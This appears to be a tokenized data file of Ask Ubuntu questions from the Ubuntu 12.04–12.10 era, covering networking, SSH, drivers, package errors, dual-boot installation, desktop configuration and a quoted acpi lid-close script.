236742	unable to see 12.10 on network or connect via ssh	i am sure i am missing something very obvious but can not figure it out . i am trying to connect to my ubuntu 12.10 machine via connectbot on my phone . in 12.04 this worked no problem , since i upgraded something is wrong ( no route to host ) . what i have tried : allowing port 22 in ufw disabling ufw all together just in case ( then later starting it back up ) connecting to my ssh server via localhost and ensuring that it is running i can access my raspberry pi from the ubuntu machine , and my phone ( the raspberry pi does not see my ubuntu machine when trying to ssh from there as well ) , i am sure the problem is my ubuntu machine does n't show up on my network at all ( when searching via nmap or fing ) and most likely it is terribly simple , the answer just escapes me . i have searched around but most people having this problem or similar ones are trying to access from a windows machine or a mac , and none of the information there does me any good . a point in the right direction would be greatly appreciated ! edit : the results from ip adress show on the ubuntu machine : 1 : lo : mtu 16436 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : .eth0 : mtu 1500 qdisc pfifo_fast state down qlen 1000 link/ether 1c:75:08:7f:9c:36 brd ff : ff : ff : ff : ff : ff 3 : wlan0 : mtu 1500 qdisc mq state up qlen 1000 link/ether 7c:4f : b5:07:9b : bf brd ff : ff : ff : ff : ff : ff inet 192.168.1.5/24 brd 192.168.1.255 scope global wlan0 inet6 fe80 : :7e4f : b5ff : fe07:9bbf/64 scope link valid_lft forever preferred_lft forever the results from ip route show , same machine : default via 192.168.1.1 dev wlan0 proto static 169.254.0.0/16 dev wlan0 scope link metric 1000 192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.5 metric 9 the results of ip address show from the raspberry pi : 1 : lo : mtu 16436 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : mtu 1500 qdisc pfifo_fast state up qlen 1000 link/ether b8:27 : eb:30 : d0 : e4 brd ff : ff : ff : ff : ff : ff inet 192.168.1.11/24 brd 192.168.1.255 scope global eth0 inet6 fe80 : :ba27 : ebff : fe30 : d0e4/64 scope link valid_lft forever preferred_lft forever ip route show from pi : default via 192.168.1.1 dev eth0 proto static 192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.11 ip address show from android phone : 1 : lo : mtu 16436 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : ifb0 : mtu 1500 qdisc noop state down qlen 32 link/ether 52:60:12:6a:1a : f3 brd ff : ff : ff : ff : ff : ff 3 : ifb1 : mtu 1500 qdisc noop state down qlen 32 link/ether ee : ae:5e : d4:46:58 brd ff : ff : ff : ff : ff : ff 4 : usb0 : mtu 1500 qdisc noop state down qlen 1000 link/ether 5e:34 : a7:57 : f6:6a brd ff : ff : ff : ff : ff : ff 5 : qmi0 : mtu 1428 qdisc pfifo_fast state down qlen 1000 link/ether e6:8e:68:25 : df : de brd ff : ff : ff : ff : ff : ff 6 : qmi1 : mtu 1428 qdisc pfifo_fast state down qlen 1000 link/ether f2 : c7:8f:3a:3f:97 brd ff : ff : ff : ff : ff : ff 7 : qmi2 : mtu 1500 qdisc noop state down qlen 1000 link/ether 1a:55:56:25 : eb : a8 brd ff : ff : ff : ff : ff : ff 8 : qmi3 : mtu 1500 qdisc noop state down qlen 1000 link/ether 42 : b9:3a : e5:2c:23 brd ff : ff : ff : ff : ff : ff 9 : sit0 : mtu 1480 qdisc noop state down link/sit 0.0.0.0 brd 0.0.0.0 10 : ip6tnl0 : mtu 1452 qdisc noop state down link/tunnel6 : : brd : : 11 : usb1 : mtu 1500 qdisc pfifo_fast state unknown qlen 1000 link/ether 02:21:00:1d:34 : fb brd ff : ff : ff : ff : ff : ff inet 192.168.157.1/29 brd 192.168.157.7 scope global usb1 inet6 fe80 : :21 : ff : fe1d:34fb/64 scope link valid_lft forever preferred_lft forever 12 : mmi0 : mtu 1428 qdisc pfifo_fast state down qlen 1000 link/ether 02:21:00:1d:38 : fb brd ff : ff : ff : ff : ff : ff 13 : mmi1 : mtu 1428 qdisc pfifo_fast master rmnet1 state unknown qlen 1000 link/ether 02:21:00:1d:3c : fb brd ff : ff : ff : ff : ff : ff inet6 fe80 : :13:80a9:6e01/64 scope link valid_lft forever preferred_lft forever 14 : mmi2 : mtu 1428 qdisc pfifo_fast state down qlen 1000 link/ether 02:21:00:1d:40 : fb brd ff : ff : ff : ff : ff : ff 15 : mmi3 : mtu 1500 qdisc noop state down qlen 1000 link/ether 02:21:00:1d:44 : fb brd ff : ff : ff : ff : ff : ff 48 : rmnet1 : mtu 1428 qdisc noqueue state up link/ether 02:21:00:1d:3c : fb brd ff : ff : ff : ff : ff : ff inet6 2600:1010:812b : d7ba : :101/64 scope global valid_lft forever preferred_lft forever 94 : wlan0 : mtu 1500 qdisc mq state up qlen 1000 link/ether 3c:43:8e:66 : ad : b7 brd ff : ff : ff : ff : ff : ff inet 192.168.1.6/24 brd 192.168.1.255 scope global wlan0 inet6 fe80 : :3e43:8eff : fe66 : adb7/64 scope link valid_lft forever preferred_lft forever ip route show from android : default via 192.168.1.1 dev wlan0 192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.6 metric 394 192.168.1.1 dev wlan0 scope link 192.168.157.0/29 dev usb1 proto kernel scope link src 192.168.157.1 yes i am using dhcp and thank you all for taking time to help me with this , if nothing else i am becoming much more familiar with the environment i compute in daily ! edit 2 todays updates ( 1/9/13 ) seem to have solved the problem completely , shortly after i installed them i noticed my ubuntu machine showing up on my phone , and also was able to connect via ssh from my phone , or any other device in the home . i looked through the installed updates and could not see anything that obviously would have solved the problem , but something did . i would be happy to post a list of what installed if that is useful in any way , also , if someone has the time , please advise as to how i should clean up this question , or if i should delete it all together since it appears an update solved the problem . thanks again for all the help !
236745	is there a way to download updates differentially rather than via .deb files ?	in the old days , you downloaded or installed packages from a cd , and then a year later you got the new version of your distribution . the .deb system made sense . nowadays , there 's a security hole patched every 3 days in one of the big monolithic packages ( mozilla , libreoffice , the kernel , etc ) where a patch probably changes on average < 1 % of the files but it requires to download the whole collection of .deb files in their entirety every time . if you look at the bandwidth used to actual payload ratio used for say a year of regular updates , it must be like 1:100 . is there a replacement available or in development that downloads packages at the file level to avoid redownloading all the files that have n't changed , and ideally using diffs for files that have ( e.g . rsync based ) . integrity can be ensured by downloading a signature file for the .deb and then checking that the diff-update has reconstituted it correctly . edit : my concern is not so much download speed but the global bandwidth wastage it causes . given estimates of 12 million users known to canonical , if we conservatively assume 100mb of monthly bandwidth wastage per user per month , that 's 1200 tb of wasted bandwidth per month . at amazon web services prices , that 's $ 125k/month , so about a million dollars or two a year . add to that people who inadvertently pay high charges on restricted bandwidth or mobile connections ( i 've had the odd 10 euros surcharge myself ) , and other debian-based distributions without delta updates , and it could reach 10+ million dollars . not the end of the world on a global level , but still resources which could be better used .
236746	how to turn on network discovery and share between computers with samba	i have an ubuntu server . accessing the server from windows clients works fine . but the server is not listed among the available pcs on windows client 's network overview . for windows machines it would be the `` network discovery '' feature . how can i make my samba server visible on the network ? edit : windows version is `` windows 7 '' . the workgroup in smb.conf is the same as in windows .
236748	service tab-completion broken as root , not even sure where to start looking	on most of our servers , tab completion of service names after typing in the service command no longer works , as root . it works just fine as non-root . this is on ubuntu 12.04 . i 'm not even sure where to start looking or what logs to look at to troubleshoot this . e.g . : tab completion works . now it does n't . any help would be greatly appreciated .
236760	lubuntu 12.10 cpu frequency not working	i 've got a acer aspire one with atom processor n270 . the thing that i notice is that the just surfing the web , the netbook chews through the battery , the fan is on a lot and it is very hot . it seems that the governor is not running correctly . anyone else experience this ? ideas for fixing ?
236762	what is to be done with all the sources disabled on upgrade ?	after upgrading from lubuntu 12.04 to 12.10 i see a lot of repositories disabled in the list of sources . what should i do ?
236766	logitech h600 wireless headphones no sound ?	i received a logitech h600 headphone set as a gift . when i plug it in to my ubuntu 12.04 computer , it shows in the sound preferences as both a sound input device and output device . i can select it , but i can not get any sound from it . does this headset work on ubuntu , and if so , what do you have to do to get it working ?
236771	first time xubuntu user	i hope this is a pretty basic problem but i opted to 'try ' rather than 'install ' xubuntu , however i ca n't get back to my original operating system . a friend said all i 'd need to do was re-start and the original os would boot but this is not the case . any help would be gratefully received . many thanks will
236773	where do i report bugs/problems with valve 's steam ?	i have a problem with steam or one of it 's games , how do i report this to valve ?
236775	how to move title bar buttons to the left in pantheon/gala ?	i want to move the window-buttons to the left in the pantheon 1.29 . how can i do this ?
236777	embedded video not playing in firefox	i can play video on the youtube website , but i can not play youtube videos embedded in facebook or other websites . captchas are also not showing up , i suspect the two problems are really the same problem . this started about a week or two ago .
236778	using chroot with a java application	i 'm working on designing a group of java programs that i hope to turn into a java-based os someday . until i get a kernel working , i want to just run them on top of ubuntu . because of this , i need all filesystem calls directed to a different directory in my home folder , so accessing / from within java would actually access /home/ < user > /thunderbolt/ . i 've looked at the community documentation for using chroot , but it says to set up a basic installation of ubuntu in it . is this really necessary ? all i want is to run java applications inside it so the app thinks it is in its own fake filesystem . i do n't want all the extra ubuntu stuff . according to the aforesaid docs : in many ways , a chroot is like installing another operating system inside your existing operating system . but i do n't want this . all i want is to hide most of the real filesystem from the app so it sees only one directory . i 've also seen the manpage for the chroot function . will this do what i want ? is there any simple way to run a java application in its own fake filesystem using chroot ( without all the extra ubuntu stuff ) , and if so , how ?
236779	how to mount an android jelly bean phone if there 's no option ?	i ca n't mount the lg optimus p700 ( running the android jelly bean oem image ) on my ubuntu 12.10 . other phones always have a selectable `` mass storage '' menu , but this one has no menu option for it when being connected to usb . you can only select media sync ( mtp ) , usb tethering and `` pc software '' , which seems to be waiting for a custom software to answer when being selected . if the device is connected , i can see it via lsusb , so the device is allowed in apparmor . how can i manually mount the device ? is it possible to mount such a device via mtp ? how can i do that ? solutions : airdroid : airdroid is an app that allows uploading files via http ( even inside an isolated lan ) to your phone and has many other features . it is available free in the play store : https : //play.google.com/store/apps/details ? id=com.sand.airdroid & hl=en go-mtpfs : go mtpfs is a fuse filesystem using mtp ( media transfer protocol ) which is available on such phones while selecting `` connect to media suite '' or similar . installation instructions ( also with a ppa ) : http : //www.webupd8.org/2012/12/how-to-mount-android-40-ubuntu-go-mtpfs.html
236780	notebook does n't sleep when lid being closed	i have ubuntu 12.10 installed on my asus g75vw which is connected to two external screen . i 've set my settings in system settings > power to do nothing for ac and suspend for dc . it has worked great until today after i installed xscreensaver . the problems start when i could n't lock the computer ( ctrl+alt+l ) , and nothing happen when i choose shutdown or restart . after i 've shutdown with the power button on the laptop and start again i got problems with the settings in nvidia x server , but i succeeded to solve that problem . i uninstall xscreensaver and after that could i lock the computer and i thought that all problems where gone . when the computer ran in battery mode and i closed the lid should it go to sleep , but nothing happen . i know that the suspend function works because i have tested it . maybe i find the reason in /etc/acpi/lid.sh . # ! /bin/bash # todo : change the above to /bin/sh test -f /usr/share/acpi-support/state-funcs || exit 0 . /usr/share/acpi-support/power-funcs . /usr/share/acpi-support/policy-funcs . /etc/default/acpi-support [ -x /etc/acpi/local/lid.sh.pre ] & & /etc/acpi/local/lid.sh.pre if [ `checkpolicy` = 0 ] ; then exit ; fi grep -q closed /proc/acpi/button/lid/*/state if [ $ ? = 0 ] then for x in /tmp/.x11-unix/* ; do displaynum=`echo $ x | sed s # /tmp/.x11-unix/x # # ` getxuser ; if [ x '' $ xauthority '' ! = x '' '' ] ; then export display= '' : $ displaynum '' . /usr/share/acpi-support/screenblank fi done else for x in /tmp/.x11-unix/* ; do displaynum=`echo $ x | sed s # /tmp/.x11-unix/x # # ` getxuser ; if [ x '' $ xauthority '' ! = x '' '' ] ; then export display= '' : $ displaynum '' grep -q off-line /proc/acpi/ac_adapter/*/state if [ $ ? = 1 ] then if pidof xscreensaver > /dev/null ; then su $ user -c `` xscreensaver-command -unthrottle '' fi fi if [ x $ radeon_light = xtrue ] ; then [ -x /usr/sbin/radeontool ] & & radeontool light on fi if [ `pidof xscreensaver` ] ; then su $ user -c `` xscreensaver-command -deactivate '' fi su $ user -c `` xset dpms force on '' fi done fi [ -x /etc/acpi/local/lid.sh.post ] & & /etc/acpi/local/lid.sh.post what i want : solve the problem so those settings i set with system settings > power works correctly . can i do any system recovery ( like in windows ) ? if number 1 are too hard to make , i want to add code into lid.sh which go to sleep if the lid being closed and the computer run at battery . very grateful for help ! ! !
236785	how to enlarge icons in browse menu ?	how can i enlarge icon in browse menu ? when i want to upload some pictures to sites , and when a window opens for finding and selection images , icons are to small , i need to enlarge them so i can see pictures right away ( dont want to click on every one to see preview ) . see image attached .
236787	install ubuntu next to windows 8 ( uefi dual boot )	windows 8 is already jnstalled in uefi mode on an asus g55vw laptop . sad but true , i need it - for now . downloaded the last version of ubuntu 12.10 . made a bootable cd from the iso-file . reboot in efi-mode . bios - > check , ubuntu boot screen - > check both indicating the system is running both cd and hdd in efi mode . pressing both `` install '' and `` try '' options result in 20seconds of cd and hdd operating-sounds and leds blinking . then silence and a blank screen . i would really be greatfull for some suggestions : )
236790	messed up my hybrid graphics configuration	i was trying to make the switch possible between my intel and radeon amd graphic card following this thread : http : //ubuntuforums.org/showthread.php ? t=1930450 , but apparently the installation of the packages messed up my default configuration ( yeah , my graphic cards were n't in the list of `` supported '' ... but i wanted to check anyways ! ) , which caused compiz to crash and i do n't know how to restore the default configuration so compiz will work again . i was at step 1 , in the part when it says : and configure the xserver ( xorg.conf file ) for the first time : sudo aticonfig -- initial -f after that , i rebooted and everything crashed . is there a way to go back ? thanks in advance . technical specifications i own an hp envy 15-3040nr , which has : processor : i7-2670qm . graphic cards : amd radeon hd 6600m series and a 2nd generation core processor family integrated graphics controller . i i 'm running on ubuntu 12.10 . thanks in advance .
236794	failed to fetch error 404 ubuntu 12.10	i have been searching for this topic and try many answers but still no positive results w : failed to fetch http : //ppa.launchpad.net/petrakis/wdt-main/ubuntu/dists/quantal/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/petrakis/wdt-main/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found , w : failed to fetch http : //ppa.launchpad.net/petrakis/wdt-main/ubuntu/dists/quantal/main/binary-i386/packages 404 not found , w : failed to fetch http : //ppa.launchpad.net/screenlets/ppa/ubuntu/dists/quantal/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/screenlets/ppa/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found , w : failed to fetch http : //ppa.launchpad.net/screenlets/ppa/ubuntu/dists/quantal/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . each time i try to update i get this error . i try to use the script that they recommend in this answer and still the same error . any idea ?
236795	two sound cards with dynamic switching	i wanted to use my m-audio and on board sound cards the way i do while using windows 7 . m-audio is the `` main '' card which has the speakers plugged in . when i plug my headphones in on front panel ( connected to mother board ) windows switches the output from m-audio to on board sound card . is something like that easy to replicate in ubuntu 12.10 ? the on board audio chipset is from amd .
236796	unity equivalent to gnome drawers and/or unique icons	back when i was using gnome i had a number of quick shortcuts to various applications with custom switches tucked away in `` drawers '' . it meant a two-click distance to things like starting and stopping servers , or gaining a shell in a particular server . is there an equivalent to this in unity ? i 've tried creating desktop icons , but they always seem to get bundled together on the unity bar , making the tooltip misleading and difficult to find a currently running shell on a particular server . ( e.g . the tooltip always lists the name of the first server called as a shell , and separate to shells called from the unity bar . ) i 've heard that i can create special commands that enable me to right-click an icon in the unity bar , is that the better solution to this ? ideally , i 'd like to be able to visually select an icon , since each one of my servers has it 's own unique icon anyway for this sort of thing .
236799	is it possible to convert lvm filesystem back to normal ?	my filesystem setup is an lvm setup . i 'm wanting to try installing elementaryos luna beta 1 on its own partition , but unfortunately it does n't support lvm yet . is there any easy way to do this ?
236800	x crashes immediately on login	the errors i get say there are problems loading the nvidia kernel modules , but i tried purging the nvidia drivers also with no success . is there a way to completely restore xorg configuration to default ?
236801	downloading glade source	i 'm about to download the source code for glade from http : //glade.gnome.org/sources.html it has two options stable tarballs for glade 3.8 for gtk+2 stable tarballs for glade 3.14 for gtk+3 which one should i pick if i 'm running ubuntu version 12.1
236803	upstart conf changes do not reload after edit	after i make some changes to an upstart conf file upstart does not reload the new changes until i reboot the system start on filesystem or runlevel [ 23 ] stop on runlevel [ 6 ] respawn expect fork script echo `` starting gunicorn.. '' > /tmp/upstart_t exec /srv/sms/mwav_messenger/gunicorn_start.sh end script console output if i was to alter this script i would continue to get the original behaviour . further to this if i stop or start the script manually the commandline simply hangs and i need to control-c to get back to the commandline . cheers .
236809	how to clean duplicates existing in one folder from another recursively ?	summary : folder a has only many excelent files folder b has many folders of mixed excelent/good/bad files how can i delete files in folder b folders only in case they will be in folder a . or simply putting same thing : how to make checking of folder a files if they exist in folder b folders then delete from folder b folders ? idea of solution maybe a command witch : checks part of alphabet like all starting with a executing deletion on files found in folder b subfolders repeat 1 . + one alphabet up . cause duplication programs were bad : long time until 1st deletion- its only when finished scanning and no possible to choose deleting in folder b . its possible only to keep latest and something else also but not by choosing in witch folder to keep . useless history : files were copied from recuva in folder b and partly arranged but a lot of them are bad so 1st im thinking folder b comparing if exist to thouse witch recovered again but now just excelent recovered in folder a by recuva so most of excelent will be just in folder a . example file tree : . ├── a │ ├── 1.png │ ├── 2.png │ └── excellent │ ├── e1.png │ └── e2.png └── b ├── 1.png ├── 2.png ├── bad │ ├── 1.png │ ├── 2.png │ ├── e1.png │ └── e2.png └── excellent ├── e1.png └── e2.png
236811	how do i install qt5 , which comes as a .run file ?	i downloaded http : //qt-project.org/downloads qt5 libary for linux 64bit the library format is .run but if i try to open it , i 'll get the following error sh ./qt.run ./qt.run : 1 : ./qt.run : can not open @ 8 : no such file ./qt.run : 1 : ./qt.run : elf : not found ./qt.run : 1 : ./qt.run : syntax error : word unexpected ( expecting `` ) '' ) and then it produces a garbage file .
236817	ubuntu 12.10 installation type	i am new to linux . i am trying to install ubuntu 12.10 on my parallels virtual machine on macbook . it is asking for the installation type where it says `` erase disk and install ubuntu '' i dont understand what option i should select here . if i select this option `` erase disc and install ubuntu '' will it erase everything on the harddisk . i just want to install it on virtual machine so that i could use both mack and ubuntu . please help
236824	how to have variable definition in place of command ?	i am using chroot in a script , the purpose is to run a command , here is chroot syntax : chroot [ option ] newroot [ command [ arg ] ... ] the problem is the command i am running needs to take a variable defition , like this - chroot /myroot foo=bar my_cmd but when i do this , i get error message bash : foo=bar , no such file or directory , looks like the first position must be command . is there a workaround of this ?
236828	can i control ubuntu 12.10 desktop while it is being remotely controlled ?	me and a friend are trying to do a certain activity on my ubuntu desktop ; it is a program on my computer that he and i want to work on remotely . so naturally the remote login feature occurred to me , but i was wondering if i could control the os at the same time he is ?
236830	ubuntu windows installer failed	so through a fault mostly mine i decided to use the ubuntu installer for windows on my pc . which installed what i think was the 32 bit version of ubuntu and i have a 64 bit system , so when i try to boot ubuntu it just sends me to the root ( i think ) . i 'm just curious if there 's a way to partition back the 30gb i set aside from it/uninstall it or can i just put in the 64bit disk i burned and that take care of it ? thank you for your help .
236844	how to create your own ubuntu distribution based on ubuntu 12.10 ?	i want to create my own distro based on ubuntu , any idea will be appreciated .
236847	custom desktop environment for debian/ubuntu	i like unity a lot for its gorgeous dash and panel look , the global menu and hud , the super+ # shortcuts and that 's it . i really hate it for the stupid launcher and its general inflexibility compared to almost every other de ( including windows ) as probably most of us do . i would much rather have cinnamon 's or mate 's modularity but i ca n't switch to these because i just can not do without unity 's best features and compiz as far as i know is unrivalled . so my question is how can i have some sort of unity + cinnamon ? can i tweak unity into looking more like cinnamon ? are there any tools out there to replace the panel or even add an extra panel layer on top of it ? so far i 've been doing just that to some extent , using tint2 ( amazing tool btw ) on top of the unity panel since the launcher is no good : i 'd also like rock solid stability so i was wondering if in that regard installing debian stable + unity + tint2 + whatever-you-can-suggest would be better than the 12.04 ubuntu i have right now . if it is i wo n't hesitate , i do n't mind tweaking and learning . and if by miracle you could get me compiz awesomeness and unity 's good features without these 2 , i 'd immediately go for it , e.g . i hear kde can emulate almost any desktop with enough tweak . i ask this question on askubuntu because i feel many ubuntu users are frustrated with this dilemma as well and as such are really likely to have looked into that before i did , if not feel free to redirect . thank you .
236849	i want to format my hard drive and install lubuntu from dvd- where do i start ?	i have 256 mg ram . i do n't really need xp . i ran lubuntu with live cd but could not install it with xp ( which i do n't really need ) . my computer is for back up only . i need something to access the internet quickly months down the road with out updating the os and virus program . i need step by step directions or to be pointed to a web site with those directions .
236850	i am not able change the themes . there is no .themes folder . and there are no my unity application and gnome application in software center	okay.. i am new to ubuntu . i have been trying to change the theme but i am not being successful . first of all , there is no .themes folder in the home folder . and there is no my unity application or gnome application in software center . i tried using the tutorial given below but i have been unsuccessful because of the problems i am facing . please help . how can i install themes on ubuntu 12.04lts ? i know where to get but i do n't know how to install them after i downloaded
236854	how to install realtek audio driver ?	i have downloaded the realtek audio driver from realtek website . the file name is linuxpkg_5.17rc13.tar.bz2 . i was wondering if someone could please help me out in installing the driver ? i am new to this platform and am finding a hard time installing it : ( i am using ubuntu 12.10 . thanks in advance
236857	will ubuntu mobile have support for widgets on the home screens ?	will ubuntu mobile have support for widgets on the home screens ? if so what technologies should developers be researching in order to develop new widgets ? would they simply be qml components that can be added at runtime ?
236859	are there adverse effects from ( or a better way than ) writing to /run or /dev/shm to protect temporarily unencrypted data ?	i am having trouble finding an answer to a question about protecting unencrypted data . i run ubuntu 12.04 . although i 'm not sure that it 's relevant , i 'll also mention that i use an encrypted home directory ( and thus also have encrypted swap space ) but do not use full-disk encryption . my hard drive is formatted with ext4 . i have a text file that contains some application passwords . i keep this file encrypted using gpg . whenever i want to edit the passwords in the file , i use gpg to write the decrypted contents to disk , edit the text in my favourite text editor ( currently , gedit ) , have gpg re-encrypt the file , and then rm the unencrypted version . recently , i 've realized that in being written to disk , the unencrypted text could possibly be read from the disk itself if it 's not overwritten . i realize that shred really does n't work for this purpose with a journaling filesystem like ext4 . i read at http : //stackoverflow.com/a/12289967 that it 's possible to write the unencrypted file to a tmpfs -- i.e. , directly to ram or swap space . the post that i linked to suggests using /dev/shm ; however , my understanding is that that directory is intended to be used for shared memory operations , and has also been deprecated in favor of /run/shm . it sounds like writing to /run might be a better idea , then . if i were to write the decrypted file to /run ( or , for that matter , to /dev/shm ) , would there be any adverse consequences ? would the file be protected more than if it were written straight to disk ( like i 've been doing ) ? is writing to those directories a bad idea for reasons i do n't even know to think of ? i 'll be very grateful for any advice that you can offer . thank you !
236860	why i ca n't install the ubuntu components	when i type the command in the terminal : sudo apt-get install qt-components-ubuntu and press enter it says : ca n't find the qt-components-ubuntu package why ?
236861	pdf printouts very small	ubuntu 12.10 , using both okular and acroread . when printing the pages print in what seems to be a 6-up layout . only for pdf . printing directly from firefox or libreoffice , the documents print full size for the page . i am not printing n-up , in fact i explicitly checked that in okular ( acroread has a brain-damaged printer interface , but so it goes ) .
236865	need help with partitions	i made a bootable usb and put it in my computer . then i edited boot entry ( added nomodeset ) and it ran . i click on install ubuntu and when it comes to partitions , i do n't understand a thing . i have a 640gb hard drive , 32gb usb and another 4gb usb which contains the ubuntu installation . is it a good idea to use my 32gb usb for partition ? do i have to shrink a partition in windows and then use it on ubuntu ? how do i know which partition is which ? thank you for help !
236867	ubuntu 12.10 freezes on loading ( logo ) screen while installing	i 'm trying to install ubuntu 12.10 on my laptop : toshiba a-665 - i7 1.7 ghz - 4gb ram - nvidia geforce gts350m . after ubuntu boot it always freezes in the purple loading screen , with the logo on it . i 've checked the iso file , the livecd and re-downloaded and re-written the iso many times , also tried with liveusb . conclusion : the ubuntu live environment just wo n't start , i even tried to install other linux distros , such as opensuse 12.2 and also gave me the same problem exactly . i get exactly the same results with using different video modes and kernel options . i even used the text mode an nothing helped . to clarify : i turn on my laptop boot from the ubuntu live edition . boot screen appears and the purple screen with the logo appears , starts filling up those orange dots , the icon stops filling at this point and the dvd drive stops spinning , as does the disk-usage light on my laptop . and i ca n't open the dvd drive tray , with no response at all . no errors appears . no response at all from the keyboard , i have to hold down the power button to reboot .
236879	windows 7 drivers compatible with ubuntu in lenovo ideapad s100 ?	i am planning to install ubuntu on my lenovo ideapad s100 with the following specifications : intel atom cpu n570 1.66ghz 1.67 ghz 2gb ram . i only have the required drivers for windows 7 32 bit . will my windows 7 drivers work in ubuntu ? do i also need drivers for ubuntu ? in case i need drivers , where should i get them ?
236885	2 hard disk drives with ubuntu	i 've just downloaded ubuntu 12.04 and i 've already installed it on 2 hard disk drives , however , i want to use one disk as an storage disk ( 160gb ) and i want to use the other one for work ( 30gb ) . how can i tell to the system that i want to initialize with the disk of 30 gb and i want to left the other one ( 160gb ) connected and using it as storage ? i would be very glad to receive any suggestions .
236886	how do i mount zyxel nsa310 shares ?	i have a zyxel nsa310 nas , which is working fine with windows machines in the house . i 've also successfully created and mounted an nfs share on the two ubuntu machines . but i 'd like to mount the standard windows shares ( photo , music and video ) , and i 've had no luck . file manager finds the homestore ( the nsa310 's default name ) on the network but wo n't let me drill down . going straight to smb : does n't work . and editing /etc/fstab with plausible-looking entries yields errors . does anyone have experience of this useful device ? surely i 'm not the only one who 's wrestled with it ? !
236891	how do i install 'proper ' anti-virus protection for online banking satisfying its terms of use ?	i am using 64 bit ubuntu 12.04 lts . so far i have not been able to install well known antivirus software : clamtk seems to suffer from lots of false positives . bitdefender is a nuisance . sometimes it is there then it seems to be gone . avast seems to be of poor quality according to my system that is . also it does not support 64 bit as far as i know . avira antivir warns : 'this script has to be run as root ' althoug i am certain that i am running it as root . so now i am stuck . fyi : i would like to install antivirus software to avoid discussions with my bank since i use online banking . dutch banks are demanding 'proper ' antivirus software to be installed in their terms of use and will refuse any refunds in case you are the victim of phishing/malware if you ca n't proof you had installed it thanks so much in advance . hans
236899	12.10 wo n't install or run	i have a spare pc that i thought i 'd try 12.10 on ( i 'm new to this ) . basically it wo n't run at all , just hanging purple screens . one time running direct from the dvd it did get to desktop , but just frozen solid . the hardware is a bit old ; asrock k7s41gx with a radeon 9250 graphics card . i 'm already suspecting from net searches that the graphics card is the issue , and probably not worth persevering with . the work-arounds are a bit beyond a novice like me . the point is i do n't mind buying another card , if indeed that is the problem , but i'd like to know the replacement is likely to work with ubuntu . i 'm very keen to move away from xp , but this is hardly an encouraging start . anyone with any advice on the subject ? i doubt i 'm the only one to have run into this issue .
236902	can not format swap	i was installing ubuntu 12.04 to the side of windows 7 to my friends ' computer when i came across the partitioning of the hdd . by accident , i selected swap as the whole partition , which i intended on using it in linux . now , because i have three partitions , one for windows loader ( ~17gb ) , one for windows os ( and data , about 120gb ) and a huge swap file ( ~320gb ) . so i could n't install the linux but when i tried to both from live-ubuntu and from windows 7 , i could n't format the swap file to fat32 or ntfs . i tried using disk utilites and windows ' own formatting app from control panel . each one recognizes the partition , but when i try to format it , it says an error message . also , to top this all of , i tried all the ways in live-ubuntus disk utilitys to format it with no success . but the thing is , when i put back the boot order to launch windows , the windows does n't boot at all ! but i had to go so i could n't investigate the problem further , but i 'm feeling pretty quilty since it might be that i ruined my friends computer ... i know my explanation seems a bit confusing , but thats because i 'm not in front of the computer and i am explaining all from my memory . i would appreciate any help .
236903	sort of locked out	i only have the user set up when i installed ubuntu 12.10 . i do n't need a password and i want it to log in without prompting for a password . in user accounts i clicked the unlock padlock ( i think i entered the password ) . i then set the password to none and automatic login to on . i then clicked on the lock padlock . i thought all was good . now when i trying and install software i get the prompt for my password . neither my old password or nothing works . i can not sudo anything in user accounts i can not click the unlock button so i am locked out of doing any modifications . my goal is to not need a password . the system does not need to be secure but please assist this newbie . thanks ron
236910	video content : missing plugins	i ca n't play any video content . i keep getting errors about missing plugins . i installed the 3rd party codecs at install . i am getting the following error no packages with the requested plugins found the requested plugins are : gstreamer element ffmux_dvd gstreamer element ffdeinterlace when i look in ubuntu software centre all of the gstreamer plugins appear to be installed and the only option is to remove them .
236918	package dependency problems with wine	i am running ubuntu and trying to install wine . when i run sudo apt-get install wine , it gives the following error : the following packages have unmet dependencies : wine : depends : wine1.4 but it is not going to be installed e : unable to correct problems , you have held broken packages . i have tried using the -f flag and this does n't help . ubuntu software centre returns a similar error . edit : here is what is returned when trying to run sudo apt-get install wine1.4 : $ sudo apt-get install wine1.4 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.4 : depends : wine1.4-i386 ( = 1.4.1-0ubuntu1 ) but it is not installable recommends : gnome-exe-thumbnailer but it is not going to be installed or kde-runtime but it is not going to be installed recommends : ttf-droid recommends : ttf-mscorefonts-installer but it is not going to be installed recommends : ttf-umefont but it is not going to be installed recommends : ttf-unfonts-core but it is not going to be installed recommends : winbind but it is not going to be installed recommends : winetricks but it is not going to be installed e : unable to correct problems , you have held broken packages .
236919	ubuntu unity video/music/picture lens - settings for locations ?	if you are like me have a lot of media you will tend to have this on a few dedicated disks in your systems or external . what i wish to be able to do is search pictures/videos/music from the unity dash but locate all my media spread over a number of locations . at the moment by default the dash will only search the home folder locations for the above with no simple way to change the paths where it looks . anyone know how to set folder locations for the dash search ? thanks , murph
236922	how do i get back my suspend option in gnome shell ?	with the new version of gnome shell in ubuntu 12.10 they turned most peoples issue around by just displaying the shutdown option which becomes suspend on pressing alt . how do i get back my beloved suspend option ?
236924	matlab not working	i have a ubuntu 12.10 . i have matlab 2012b installed on it.it was working fine until the last time i tried to open it . *my problem : * matlab not working.the following message is displayed when i open it through terminal.i am new to ubuntu and i need help to resolve it . terminate called after throwing an instance of 'std : :runtime_error' what ( ) : locale : :facet : :_s_create_c_locale name not valid aborted ( core dumped )
